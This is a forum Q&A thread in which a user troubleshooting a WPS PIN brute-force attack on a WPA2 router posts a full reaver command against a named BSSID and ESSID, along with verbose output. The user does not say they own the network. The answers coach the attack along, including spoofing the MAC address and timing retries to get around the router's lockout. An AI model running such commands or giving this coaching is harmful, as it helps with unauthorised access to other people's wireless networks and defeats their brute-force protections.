# Reaver keeps reapeating the same PIN

Tags: linux, ubuntu, wireless-networking, aircrack-ng

I have been trying to Hack a WPA2 Wifi, and so far I am stuck with it.

Problem is that it keeps trying the same PIN over and over again.

Here is the last REAVER command I entered.

```
reaver -i mon0 -b 2C:AB:25:51:F1:CF -vv -c 1 -S -L -f
```

It does this (only one PIN again and again)

```
[+] Switching mon0 to channel 1
[+] Waiting for beacon from 2C:AB:25:51:F1:CF
[+] Associated with 2C:AB:25:51:F1:CF (ESSID: PTCL-BB)
[+] Trying pin 12345670
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[!] WARNING: Receive timeout occurred
[+] Sending WSC NACK
[!] WPS transaction failed (code: 0x02), re-trying last pin
[+] Trying pin 12345670
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
^C
[+] Nothing done, nothing to save.
```

Comment: Please provide `wash -i mon0 --scan` output

Answer (score 1):

The router you're cracking needs to have a relatively strong signal, so if you're hardly in range of a router, you'll likely experience problems, and Reaver may not work.

Answer (score 0):

I do not think that it the only problem.

First of all, try with wash to check WPS availability on target. Then try changing the PHYSICAL MAC address, not the monitor interface.

Some routers block MAC address after a number of failed attempts. Set reaver to a delay of 5/10 minutes before next try after PIN error.